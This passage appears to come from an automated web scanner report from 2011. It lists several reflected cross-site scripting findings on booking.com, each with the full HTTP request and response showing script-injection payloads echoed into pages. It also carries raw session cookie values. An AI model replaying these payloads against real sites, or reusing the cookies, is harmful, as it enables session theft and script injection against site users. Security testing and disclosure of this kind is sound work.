Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:16 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51870
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/logobc7af"><script>alert(1)</script>9d469f9415c" />
...[SNIP]...
4.207. http://www.booking.com/logo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /logo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a5f'%3balert(1)//e19a29d99f8 was submitted in the REST URL parameter 1. This input was echoed as 56a5f';alert(1)//e19a29d99f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /logo56a5f'%3balert(1)//e19a29d99f8?ver=1;t=13176005551 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:20 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51786
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
booking.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/logo56a5f';alert(1)//e19a29d99f8?t=13176005551;ver=1';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.e
...[SNIP]...
4.208. http://www.booking.com/searchresults.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31914"><script>alert(1)</script>d10a246203a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html31914"><script>alert(1)</script>d10a246203a?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:24:37 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59378
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/searchresults.html31914"><script>alert(1)</script>d10a246203a" />
...[SNIP]...
4.209. http://www.booking.com/searchresults.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc195'%3balert(1)//0fd97c24ba8 was submitted in the REST URL parameter 1. This input was echoed as bc195';alert(1)//0fd97c24ba8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.htmlbc195'%3balert(1)//0fd97c24ba8?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:24:40 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59294
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
e_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.htmlbc195';alert(1)//0fd97c24ba8?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.gro
...[SNIP]...
4.210. http://www.booking.com/searchresults.html [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16594</script><script>alert(1)</script>dbafd62ac0 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=33559116594</script><script>alert(1)</script>dbafd62ac0&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:06 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAGM9O1PxW9r04KF2ncDEBSHgNUXVAzVnXouEVrERXP8sy7P%2BCaMJUcQFZu89oIgncJuDQvP4RNo3KkrZuPvEkX%2BrydBU649KACjP15pDvznmAHESRGAjWDPj2XBbZ20CKN63nZQ%2BubhUjBXJheWpgkq9WzKmN1Y55fwW2qXYEDkMWLRPGDTQ04mjUp2ZrYseiu%2FxeH3bkK8WA4IKsBRoTR%2Bde1oWqSHhS62phaJI2koebIBJAYqlTDO2e7adNDgwqdSyA%2B7BLc%2FVbAwCeqdXTZ1CtAtG7491NrkorDjVvsm12Qgq623Als0UzoBv80AXQSY%2Bn3CvatxZB7HJ2iozE3YouPFrlPHMZgiI4LsEeSqSM7C9YFHYO4ho3qMZwxa0O76JFbUFb4W%2Fy22SKfRUcrYSMcRbnsbLmCXhLYc0Rvm3uPWTshBm7amXDl6oyma75EhCDqZl4idV8Bnos8XE1Dk39BiDyUXxR%2BtzA%2FtEafmHy%2Fcz%2F%2FWhs6aq7Q8OfbCP36NV%2FH20sQKm0TTLmmSVJ%2FWtOKdxLfNBIOCrj0mrFV2xueb4lWBLhDycEpebaZXcXFw0ox1yyHgzwDQI9CDChUJcuKpWmx3p8d4wMPurfdAAjvugd2V1toFJBkLQIirzwT5aTjPY47znz919Ap6GS1dr%2Bx0aZ762IwEak5eNZANtTArYxKdLWna01iT%2B8VvDE0leQRYVYRle3VdRyfzkXjUVGHkaNPd%2FVzAzPUqTgr5DBnTskNeyE1LOcj75nPBVGLtPD8MAPZp7BTFUWhW4iX%2BUz4nSZFJ8VDN%2B9xIuPoutaapBSn9P1QMHJFuKTUI2KCUddOHxvhmruzSzhHLM5dv%2FxCwwm%2B1er3ChCOnov5SWB8diPPxpuPk2gxVClueSuT0jCgMkIzcXK6RX5X6FyBX3qRKM3LNbfdHZs0VIUayEd4sKD7PXhCbwpS8zc%2FeVlz6OZVv9nh0LrnACGEi7CHAU4RBkDaJON7ZwEma5R2wKO31RwhqGUBNVOIeQL%2B%2FUJ2%2FC%2FUU%2B7XdJcNjotA2uL%2FE5N7Dnf1X%2FW9GI6wJPv49vl1oFTWdjZi93R1Uljs9nXXMSvsU1LaYXqVKEBVfn1ngeLGA3O35Jx2FzNCAan7peaGnSvEKtt5h9wzybMdPoVfIlK3nVKJsFAZfW0OCZ8eOfyi3jgcL7vTDBnVvE%2BlpjseifN6ESCeZVxYlcWgP7%2Fa6dG%2ByJFOSNvkGKbdzSPsP6m5gprwwwAyDqEbj%2BpqqLfFFgMtgd9%2FZ2OyA4SWqy%2Ff8Mo9tEjQW%2F6c6BAnqLG0b%2BhJ9%2FVC5ZVxOIpUdljs6DVLbBUbdFZXtKJyZXsri9RkKr%2FNeHdbN%2Fg3SIJQiLRCztepXtUFeHwX4%2Bq%2BJNlYtSbZ0i7XLfFkFPyCR7cxExPY21L24Ps%2Fb7LlsjYuYi40w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:07 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 385825
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
296=1&amp;',
"b_flag_to_suggest" : 'us',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=33559116594</script><script>alert(1)</script>dbafd62ac0&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign
...[SNIP]...
4.211. http://www.booking.com/searchresults.html [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the aid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d852f"><script>alert(1)</script>9c61548c4a4 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591d852f"><script>alert(1)</script>9c61548c4a4&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:27 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4ZnAyJLzPOBzWBuP%2B1qTRnLZgE%2FVJTkrYDYAgvlE8v6S1WIA01ZhQxEv402Kr88%2FCfLth59ZdFekQjiWJEdDDJtlv653nFV6MCmiw9Q%2BsjNTtFYtNsQ%2F4lYDW5GhCaPNyrNKaNruGf8Xa%2FcIrf2SdQA3%2FM3XuKCOWR5HGSDoffP8pJttFsFRlbUhFiaRlaiHgVb0EkURJLTQt3V1jftDNtid%2BuZ4LxKCnlWeTcXhqbd64vAZsTyzEd1wWr1ECaw%2F%2Fg%2Fw%2Foj5GK9JsRwekYSgHRO41Gs0Q1nGyx7dYBykQnfskwCVPgnFoxWfyK742YeOEjs2pWq0ZC82DC9sLF2L9VGHZ6Uz8%2Bc19A8rppNUXHaoJZtJoFtwlMi7mA5vxxYIOAPpdD3Uzwz2nZ4JL6QKUSgHpaDBS1w%2FnqNVpwimW73EiacZSfdO8IRXLTDzmkf7k7IqOYKNqwN4o9i0G09XqCY3yFPaYbq5fzBHkCS5HWIGjXzx%2FIZXjaSz%2BRcGf%2F2BbK0RMy9fFEYLJSkrwvJ%2FP2S1PiiV8Vf3ZpNKMm0f1vPXLOn5M7XsgS5nzxlBMOsntB%2BV8x7pMrPfcA1ddlIknj5M3Ctkqv8J0%2FJduYe85QfSkIFeOWsOrxm1zF6%2FgHSRs0PA018J1XrWq334CBd7F66jdQ3YH83rhW1k5CT%2FMQvaSmjXng5b7WBBCakSEGaUMOuusfwNX%2Fe94STbOwoQNHrbDJg8qRroJfOSsLK8AbwoznOkhrwhBGrdfVtrNlDDy4drLLy%2B3XfbV8AUsj3sLhLM%2BRMgB2ECJrqZCy6%2FiwPSKo2pOWBQtYbkC2Pyd40g3NOurcAwpG0Rx5aUqCwJ45LQsZTyRYOesvsIrJEFbFYxFgYJgNsHi%2BpnsjDxQ4VvIEOSIjnMPvSPLSa2%2B7qNbPnrWq%2Fr0dpb%2BPWQVs%2Ba3OndcJ4pP9H%2BAxv%2FkJkJJLjT%2BqclDW2nSPrxXc3vZxKkvVlsTG3A5ixcdc3jJstFvueTvQAXPDoId3%2BVYscwHLf452UvpTYruHQXRgislE4XrlS%2FENbP5n4s5%2BmkeyhdFnMzOS0NRpucGI9reYIOW%2BLwinCI3oaImjfFPU5ChNAzNsDcgFdfI9b9BdPVn5rmk2tHCb9o1IlTLmQppgkdsUpGX2csQKPvZ3D2khQyljh2c3Jv4%2B9ygbUUlHWJj1NQ8dPntRqOT1iCMj9AwhmF0MyONkZiT%2BeOLEQGVWNsTgO2GH%2Bt545EL3dlQMLrb2t0li%2BRVTrP8MSCsjr7%2FzvkPzFoTyRyhj5%2B4fRNVTJmxXCgA0G%2BuibIqRU12TowMtDZb7eBt0omwjZC%2BeaMpTsKWA2NtrDf7v1ZneBWqV3rnJG6dWnGxiKfkBkXAcZ4Oion6yMLvuAV5i4a4iI2Xt5HCpS6KDYYAaYZ